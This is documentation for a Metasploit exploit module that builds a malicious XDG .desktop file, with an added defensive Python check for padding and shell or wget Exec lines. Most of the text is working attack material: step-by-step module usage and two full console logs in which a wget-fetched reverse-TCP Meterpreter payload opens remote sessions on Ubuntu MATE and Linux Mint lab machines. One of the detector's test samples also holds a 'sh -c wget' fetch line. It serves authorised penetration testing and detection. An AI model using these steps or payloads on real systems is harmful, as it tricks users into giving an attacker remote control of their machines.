Xdg Desktop

documentation/modules/exploit/multi/fileformat/xdg_desktop.md

Vulnerable Application

This module creates a malicious XDG Desktop (.desktop) file.

On most modern systems, desktop files are not trusted by default. The user will receive a warning prompt that the file is not trusted when running the file, but may choose to run the file anyway.

The default file manager applications in some desktop environments may impose stricter execution requirements, prompting the user to set the file as executable and/or mark the file as trusted before the file can be executed.

Options

FILENAME

The desktop file name. (Default: msf.desktop)

APPLICATION_NAME

The application name. Some file managers will display this name instead of the file name. (Default: random)

Advanced Options

PrependNewLines

Prepend new lines before the payload. (Default: 100)
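
A defender-side triage check for the traits described above, as an added example that is not part of the module or its documentation: it flags a long run of blank lines (the effect of PrependNewLines) and an Exec entry that runs a shell or a download tool. The threshold, the patterns and both sample files are constructed assumptions, and the suspicious sample does not reproduce the module's actual output.

```python
import re

# Assumed heuristics for this example; not derived from the module's source.
MAX_BLANK_RUN = 10
SHELL_RE = re.compile(r"(?<![\w.-])(?:sh|bash|dash|zsh)\s+-c\b")
FETCH_RE = re.compile(r"(?<![\w.-])(?:wget|curl|tftp)\b")

def triage_desktop_entry(text):
    """Return a list of findings for the contents of one .desktop file."""
    longest = run = 0
    group, entry = None, {}
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped:
            # Track the longest run of empty lines anywhere in the file.
            run += 1
            longest = max(longest, run)
            continue
        run = 0
        if stripped.startswith("#"):
            continue
        if stripped.startswith("[") and stripped.endswith("]"):
            group = stripped[1:-1]
        elif group == "Desktop Entry" and "=" in stripped:
            key, value = stripped.split("=", 1)
            entry.setdefault(key.strip(), value.strip())
    findings = []
    if longest > MAX_BLANK_RUN:
        findings.append(f"padding: {longest} consecutive blank lines")
    exec_cmd = entry.get("Exec", "")
    if SHELL_RE.search(exec_cmd):
        findings.append("Exec runs a shell with -c")
    if FETCH_RE.search(exec_cmd):
        findings.append("Exec references a download tool")
    return findings

# Constructed samples (not output of the module); 192.0.2.10 is a documentation address.
BENIGN = "[Desktop Entry]\nType=Application\nName=Text Editor\nExec=gedit %U\n"
SUSPICIOUS = (
    "[Desktop Entry]\nType=Application\nName=Quarterly Report\n"
    + "\n" * 100
    + 'Exec=/bin/sh -c "wget http://192.0.2.10/placeholder"\n'
)

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(label, triage_desktop_entry(sample))
```

The blank-line check measures the longest run anywhere in the file, so it does not depend on where the padding sits relative to the `[Desktop Entry]` header.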

Verification Steps

On the Metasploit host:

  1. Start msfconsole
  2. Do: use exploit/multi/fileformat/xdg_desktop
  3. Do: set filename [filename.desktop]
  4. Do: set payload [payload]
  5. Do: set lhost [lhost]
  6. Do: set lport [lport]
  7. Do: run
  8. Do: handler -p [payload] -P [lport] -H [lhost]

On the target machine:

  1. Open the msf.desktop file
  2. If prompted, choose "Launch Anyway"

Scenarios

Ubuntu MATE 24.04.2 (x86_64)

msf > use exploit/multi/fileformat/xdg_desktop
[*] No payload configured, defaulting to cmd/linux/http/aarch64/meterpreter/reverse_tcp
msf exploit(multi/fileformat/xdg_desktop) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(multi/fileformat/xdg_desktop) > set lhost 192.168.200.130
lhost => 192.168.200.130
msf exploit(multi/fileformat/xdg_desktop) > set lport 4444
lport => 4444
msf exploit(multi/fileformat/xdg_desktop) > set FETCH_COMMAND wget
FETCH_COMMAND => WGET
msf exploit(multi/fileformat/xdg_desktop) > run
[+] msf.desktop stored at /root/.msf4/local/msf.desktop
msf exploit(multi/fileformat/xdg_desktop) > handler -p cmd/linux/http/x64/meterpreter/reverse_tcp -P 4444 -H 192.168.200.130
[*] Payload handler running as background job 0.

[*] Started reverse TCP handler on 192.168.200.130:4444 
msf exploit(multi/fileformat/xdg_desktop) > 
[*] Sending stage (3090404 bytes) to 192.168.200.193
[*] Meterpreter session 1 opened (192.168.200.130:4444 -> 192.168.200.193:52462) at 2025-07-29 03:29:10 -0400

msf exploit(multi/fileformat/xdg_desktop) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : linuxmint-mate-24-04.2-desktop-amd64
OS           : Ubuntu 24.04 (Linux 6.14.0-24-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 

Linux Mint 22.1 (MATE) (x86_64)

msf > use exploit/multi/fileformat/xdg_desktop 
[*] No payload configured, defaulting to cmd/linux/http/aarch64/meterpreter/reverse_tcp
msf exploit(multi/fileformat/xdg_desktop) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp 
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(multi/fileformat/xdg_desktop) > set lhost 192.168.200.130
lhost => 192.168.200.130
msf exploit(multi/fileformat/xdg_desktop) > set lport 4444
lport => 4444
msf exploit(multi/fileformat/xdg_desktop) > set FETCH_COMMAND wget
FETCH_COMMAND => WGET
msf exploit(multi/fileformat/xdg_desktop) > run
[+] msf.desktop stored at /root/.msf4/local/msf.desktop
msf exploit(multi/fileformat/xdg_desktop) > handler -p cmd/linux/http/x64/meterpreter/reverse_tcp -P 4444 -H 192.168.200.130
[*] Payload handler running as background job 0.

[*] Started reverse TCP handler on 192.168.200.130:4444 
msf exploit(multi/fileformat/xdg_desktop) > 
[*] Sending stage (3090404 bytes) to 192.168.200.189
[*] Meterpreter session 1 opened (192.168.200.130:4444 -> 192.168.200.189:35162) at 2025-07-29 02:45:34 -0400

msf exploit(multi/fileformat/xdg_desktop) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo 
Computer     : 192.168.200.189
OS           : LinuxMint 22.1 (Linux 6.8.0-51-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >